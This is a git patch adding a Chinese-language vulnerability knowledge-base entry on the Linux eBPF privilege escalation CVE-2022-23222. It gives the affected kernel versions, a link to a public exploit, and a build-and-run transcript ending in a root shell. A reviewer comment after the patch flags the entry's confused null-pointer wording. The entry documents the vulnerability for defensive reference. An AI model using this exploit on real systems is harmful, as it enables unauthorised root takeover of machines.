From 118f271038b2af074d186f43a9afb5524967234a Mon Sep 17 00:00:00 2001 From: Threekiii <472361400@qq.com> Date: Thu, 23 Jun 2022 09:19:29 +0800 Subject: [PATCH] =?UTF-8?q?=E6=93=8D=E4=BD=9C=E7=B3=BB=E7=BB=9F=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E/Linux=20eBPF=E6=9D=83=E9=99=90=E6=8F=90=E5=8D=87?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=20CVE-2022-23222.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Linux eBPF权限提升漏洞 CVE-2022-23222.md | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md diff --git a/操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md b/操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md new file mode 100644 index 0000000..3e6366f --- /dev/null +++ b/操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md 
@@ -0,0 +1,42 @@ +# Linux eBPF权限提升漏洞 CVE-2022-23222 + +## 漏洞描述 + +Linux Kernel 是美国 Linux 基金会发布的开源操作系统 Linux 所使用的内核。Linux 内核是一种开源的类Unix 操作系统宏内核。整个 Linux 操作系统家族基于该内核部署在传统计算机平台(如个人计算机和服务器)。该漏洞是由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限 + +## 漏洞影响 + +``` +Linux 5.8 - 5.16(在5.10.92 / 5.15.15 / 5.16.1中修复) +``` + +## 漏洞复现 + +Exp:https://github.com/tr3ee/CVE-2022-23222 + +``` +$ make +cc -I include -static -w -o exploit exploit.c +$ ./exploit +[*] phase(1/8) 'create bpf map(s)' running +[+] phase(1/8) 'create bpf map(s)' done +[*] phase(2/8) 'do some leak' running +[+] phase(2/8) 'do some leak' done +[*] phase(3/8) 'prepare arbitrary rw' running +[+] phase(3/8) 'prepare arbitrary rw' done +[*] phase(4/8) 'spawn processes' running +[+] phase(4/8) 'spawn processes' done +[*] phase(5/8) 'find cred (slow)' running +[+] phase(5/8) 'find cred (slow)' done +[*] phase(6/8) 'overwrite cred' running +[+] phase(6/8) 'overwrite cred' done +[*] phase(7/8) 'spawn root shell' running +[+] Enjoy root! +# id +uid=0(root) gid=0(root) groups=65534(nobody) +# exit +[+] phase(7/8) 'spawn root shell' done +[*] phase(8/8) 'clean up the mess' running +[+] phase(8/8) 'clean up the mess' done +``` +
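Review bot: the 漏洞描述 paragraph is internally inconsistent: it labels the bug a 空指针漏洞 and says the attacker performs a 空指针引用攻击, yet the same sentence describes the actual defect as the verifier 没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算, and the reproduction transcript shows phases 'prepare arbitrary rw' and 'overwrite cred', i.e. an arbitrary kernel read/write primitive reached through unchecked pointer arithmetic rather than a null-pointer dereference. Suggest rewording the description around the *_OR_NULL pointer-arithmetic cause, and closing the paragraph with a full stop (it currently ends at "最终获取服务器 root 权限"). The fixed releases are already listed under 漏洞影响 (5.10.92 / 5.15.15 / 5.16.1), so a short 修复建议 section telling readers to upgrade to one of those versions or later would complete the entry. Minor style point: both fences are untagged; the version range would read better as ```text and the exploit transcript as ```shell.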